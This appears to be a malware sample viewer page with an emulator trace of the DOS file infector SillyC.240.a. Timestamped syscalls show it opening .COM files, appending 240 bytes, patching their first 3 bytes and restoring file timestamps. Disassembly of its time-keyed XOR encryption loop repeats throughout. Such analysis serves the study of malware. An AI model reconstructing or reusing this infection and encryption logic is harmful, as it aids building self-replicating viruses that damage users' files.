Sample viewer

vx.netlux.org/Virus.DOS.SillyC.240.a

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:49:04.112021029Z 26 PC: 12a62 | Set disk transfer address
2018-12-17T22:49:04.114344169Z 78 PC: 12a77 | Find first file
2018-12-17T22:49:04.120670215Z 44 PC: 12b0e | Get time 0x12b0e: xor dl, ch
0x12b10: mov byte ptr ds:[bp + 0x1e6], dl
0x12b15: ret
0x12b16: push ax
0x12b17: mov ah, byte ptr ds:[bp + 0x1e6]
0x12b1c: mov di, si
0x12b1e: lodsb al, byte ptr [si]
0x12b1f: xor al, ah
0x12b21: stosb byte ptr es:[di], al
0x12b22: loop 0x12b1e
0x12b24: pop ax
0x12b25: ret
0x12b26: add byte ptr [di + 0x5a], cl
0x12b29: int 0x20
0x12b2b: add byte ptr [bp + si], ch
0x12b2d: arpl word ptr cs:[bx + 0x6d], bp
0x12b31: add cl, ch
0x12b33: add byte ptr [bx + si], al
0x12b35: add word ptr [bx], di
0x12b37: aas
2018-12-17T22:49:04.123652663Z 61 PC: 12a93 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:49:04.128281348Z 63 PC: 12aa1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:04.134863176Z 66 PC: 12aba | Move file pointer
2018-12-17T22:49:04.135935522Z 64 PC: 12ac7 | Write file or device (Write 240 bytes on handle 5)
2018-12-17T22:49:04.498629036Z 66 PC: 12add | Move file pointer
2018-12-17T22:49:04.50044547Z 64 PC: 12ae8 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:04.507825265Z 87 PC: 12af7 | Get or set file date and time
2018-12-17T22:49:04.509345697Z 62 PC: 12afb | Close file
2018-12-17T22:49:04.517393492Z 79 PC: 12a77 | Find next file
2018-12-17T22:49:04.519971341Z 44 PC: 12b0e | Get time 0x12b0e: xor dl, ch
0x12b10: mov byte ptr ds:[bp + 0x1e6], dl
0x12b15: ret
0x12b16: push ax
0x12b17: mov ah, byte ptr ds:[bp + 0x1e6]
0x12b1c: mov di, si
0x12b1e: lodsb al, byte ptr [si]
0x12b1f: xor al, ah
0x12b21: stosb byte ptr es:[di], al
0x12b22: loop 0x12b1e
0x12b24: pop ax
0x12b25: ret
0x12b26: cmp cl, byte ptr [di + 0x5a]
0x12b29: call 0x632e5567
0x12b2f: outsw dx, word ptr [si]
0x12b30: insw word ptr es:[di], dx
0x12b31: add cl, ch
0x12b33: xchg ax, sp
0x12b34: add word ptr [bx + di], ax
0x12b36: aas
2018-12-17T22:49:04.522305005Z 61 PC: 12a93 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:49:04.530822134Z 63 PC: 12aa1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:04.53765724Z 66 PC: 12aba | Move file pointer
2018-12-17T22:49:04.539000235Z 64 PC: 12ac7 | Write file or device (Write 240 bytes on handle 5)
2018-12-17T22:49:04.542499209Z 66 PC: 12add | Move file pointer
2018-12-17T22:49:04.543817315Z 64 PC: 12ae8 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:04.553469378Z 87 PC: 12af7 | Get or set file date and time
2018-12-17T22:49:04.556259791Z 62 PC: 12afb | Close file
2018-12-17T22:49:04.564009408Z 79 PC: 12a77 | Find next file
2018-12-17T22:49:04.566822935Z 44 PC: 12b0e | Get time 0x12b0e: xor dl, ch
0x12b10: mov byte ptr ds:[bp + 0x1e6], dl
0x12b15: ret
0x12b16: push ax
0x12b17: mov ah, byte ptr ds:[bp + 0x1e6]
0x12b1c: mov di, si
0x12b1e: lodsb al, byte ptr [si]
0x12b1f: xor al, ah
0x12b21: stosb byte ptr es:[di], al
0x12b22: loop 0x12b1e
0x12b24: pop ax
0x12b25: ret
0x12b26: cmp cl, byte ptr [di + 0x5a]
0x12b29: mov dx, 0x10b
0x12b2c: sub ch, byte ptr [0x6f63]
0x12b30: insw word ptr es:[di], dx
0x12b31: add cl, ch
0x12b33: sbb byte ptr [bx + si], al
0x12b35: add word ptr [bx], di
0x12b37: aas
2018-12-17T22:49:04.570019357Z 61 PC: 12a93 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:49:04.5772684Z 63 PC: 12aa1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:04.58363222Z 66 PC: 12aba | Move file pointer
2018-12-17T22:49:04.58552936Z 64 PC: 12ac7 | Write file or device (Write 240 bytes on handle 5)
2018-12-17T22:49:04.589183223Z 66 PC: 12add | Move file pointer
2018-12-17T22:49:04.590729806Z 64 PC: 12ae8 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:04.593533569Z 87 PC: 12af7 | Get or set file date and time
2018-12-17T22:49:04.596272155Z 62 PC: 12afb | Close file
2018-12-17T22:49:04.603621162Z 79 PC: 12a77 | Find next file
2018-12-17T22:49:04.607093503Z 44 PC: 12b0e | Get time 0x12b0e: xor dl, ch
0x12b10: mov byte ptr ds:[bp + 0x1e6], dl
0x12b15: ret
0x12b16: push ax
0x12b17: mov ah, byte ptr ds:[bp + 0x1e6]
0x12b1c: mov di, si
0x12b1e: lodsb al, byte ptr [si]
0x12b1f: xor al, ah
0x12b21: stosb byte ptr es:[di], al
0x12b22: loop 0x12b1e
0x12b24: pop ax
0x12b25: ret
0x12b26: inc ax
0x12b27: dec bp
0x12b28: pop dx
0x12b29: call 0x632e5533
0x12b2f: outsw dx, word ptr [si]
0x12b30: insw word ptr es:[di], dx
0x12b31: add cl, ch
0x12b33: pop cx
2018-12-17T22:49:04.610389591Z 61 PC: 12a93 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:49:04.616947664Z 63 PC: 12aa1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:04.623399001Z 66 PC: 12aba | Move file pointer
2018-12-17T22:49:04.625671563Z 64 PC: 12ac7 | Write file or device (Write 240 bytes on handle 5)
2018-12-17T22:49:04.628558764Z 66 PC: 12add | Move file pointer
2018-12-17T22:49:04.629852439Z 64 PC: 12ae8 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:04.633432724Z 87 PC: 12af7 | Get or set file date and time
2018-12-17T22:49:04.635612206Z 62 PC: 12afb | Close file
2018-12-17T22:49:04.641032136Z 79 PC: 12a77 | Find next file
2018-12-17T22:49:04.643429891Z 44 PC: 12b0e | Get time 0x12b0e: xor dl, ch
0x12b10: mov byte ptr ds:[bp + 0x1e6], dl
0x12b15: ret
0x12b16: push ax
0x12b17: mov ah, byte ptr ds:[bp + 0x1e6]
0x12b1c: mov di, si
0x12b1e: lodsb al, byte ptr [si]
0x12b1f: xor al, ah
0x12b21: stosb byte ptr es:[di], al
0x12b22: loop 0x12b1e
0x12b24: pop ax
0x12b25: ret
0x12b26: inc bp
0x12b27: dec bp
0x12b28: pop dx
0x12b29: mov dx, 0x10d
0x12b2c: sub ch, byte ptr [0x6f63]
0x12b30: insw word ptr es:[di], dx
0x12b31: add cl, ch
0x12b33: sbb al, byte ptr [bx + si]
2018-12-17T22:49:04.645077405Z 61 PC: 12a93 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:49:04.649280954Z 63 PC: 12aa1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:04.653396064Z 66 PC: 12aba | Move file pointer
2018-12-17T22:49:04.655058683Z 64 PC: 12ac7 | Write file or device (Write 240 bytes on handle 5)
2018-12-17T22:49:04.656902543Z 66 PC: 12add | Move file pointer
2018-12-17T22:49:04.65801201Z 64 PC: 12ae8 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:04.660523013Z 87 PC: 12af7 | Get or set file date and time
2018-12-17T22:49:04.661692333Z 62 PC: 12afb | Close file
2018-12-17T22:49:04.666822182Z 79 PC: 12a77 | Find next file
2018-12-17T22:49:04.669408088Z 44 PC: 12b0e | Get time 0x12b0e: xor dl, ch
0x12b10: mov byte ptr ds:[bp + 0x1e6], dl
0x12b15: ret
0x12b16: push ax
0x12b17: mov ah, byte ptr ds:[bp + 0x1e6]
0x12b1c: mov di, si
0x12b1e: lodsb al, byte ptr [si]
0x12b1f: xor al, ah
0x12b21: stosb byte ptr es:[di], al
0x12b22: loop 0x12b1e
0x12b24: pop ax
0x12b25: ret
0x12b26: inc bp
0x12b27: dec bp
0x12b28: pop dx
0x12b29: mov dx, 0x10d
0x12b2c: sub ch, byte ptr [0x6f63]
0x12b30: insw word ptr es:[di], dx
0x12b31: add cl, ch
0x12b33: sbb al, byte ptr [bx + si]
2018-12-17T22:49:04.671074115Z 61 PC: 12a93 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:49:04.675124895Z 63 PC: 12aa1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:04.681646662Z 66 PC: 12aba | Move file pointer
2018-12-17T22:49:04.68272976Z 64 PC: 12ac7 | Write file or device (Write 240 bytes on handle 5)
2018-12-17T22:49:04.687928571Z 66 PC: 12add | Move file pointer
2018-12-17T22:49:04.689621639Z 64 PC: 12ae8 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:04.693609098Z 87 PC: 12af7 | Get or set file date and time
2018-12-17T22:49:04.695678155Z 62 PC: 12afb | Close file
2018-12-17T22:49:04.701587531Z 79 PC: 12a77 | Find next file
2018-12-17T22:49:04.703419206Z 44 PC: 12b0e | Get time 0x12b0e: xor dl, ch
0x12b10: mov byte ptr ds:[bp + 0x1e6], dl
0x12b15: ret
0x12b16: push ax
0x12b17: mov ah, byte ptr ds:[bp + 0x1e6]
0x12b1c: mov di, si
0x12b1e: lodsb al, byte ptr [si]
0x12b1f: xor al, ah
0x12b21: stosb byte ptr es:[di], al
0x12b22: loop 0x12b1e
0x12b24: pop ax
0x12b25: ret
0x12b26: inc bp
0x12b27: dec bp
0x12b28: pop dx
0x12b29: fninit
0x12b2b: mov ah, 0x2a
0x12b2d: arpl word ptr cs:[bx + 0x6d], bp
0x12b31: add cl, ch
0x12b33: add dword ptr [bx + di], ax
2018-12-17T22:49:04.704999161Z 61 PC: 12a93 | Open file (Filename = 'PAH.COM')
2018-12-17T22:49:04.710859582Z 63 PC: 12aa1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:04.715544054Z 66 PC: 12aba | Move file pointer
2018-12-17T22:49:04.716609479Z 64 PC: 12ac7 | Write file or device (Write 240 bytes on handle 5)
2018-12-17T22:49:04.718741002Z 66 PC: 12add | Move file pointer
2018-12-17T22:49:04.72029895Z 64 PC: 12ae8 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:04.731618933Z 87 PC: 12af7 | Get or set file date and time
2018-12-17T22:49:04.733187882Z 62 PC: 12afb | Close file
2018-12-17T22:49:04.739166668Z 79 PC: 12a77 | Find next file
2018-12-17T22:49:04.741135888Z 44 PC: 12b0e | Get time 0x12b0e: xor dl, ch
0x12b10: mov byte ptr ds:[bp + 0x1e6], dl
0x12b15: ret
0x12b16: push ax
0x12b17: mov ah, byte ptr ds:[bp + 0x1e6]
0x12b1c: mov di, si
0x12b1e: lodsb al, byte ptr [si]
0x12b1f: xor al, ah
0x12b21: stosb byte ptr es:[di], al
0x12b22: loop 0x12b1e
0x12b24: pop ax
0x12b25: ret
0x12b26: dec bx
0x12b27: dec bp
0x12b28: pop dx
0x12b29: mov dx, 0x10d
0x12b2c: sub ch, byte ptr [0x6f63]
0x12b30: insw word ptr es:[di], dx
0x12b31: add cl, ch
0x12b33: sbb al, byte ptr [bx + si]
2018-12-17T22:49:04.74395948Z 61 PC: 12a93 | Open file (Filename = 'TEST.COM')
2018-12-17T22:49:04.749661502Z 63 PC: 12aa1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:04.751409113Z 87 PC: 12af7 | Get or set file date and time
2018-12-17T22:49:04.753669994Z 62 PC: 12afb | Close file
2018-12-17T22:49:04.760976062Z 79 PC: 12a77 | Find next file
2018-12-17T22:49:04.763387098Z 26 PC: 12b07 | Set disk transfer address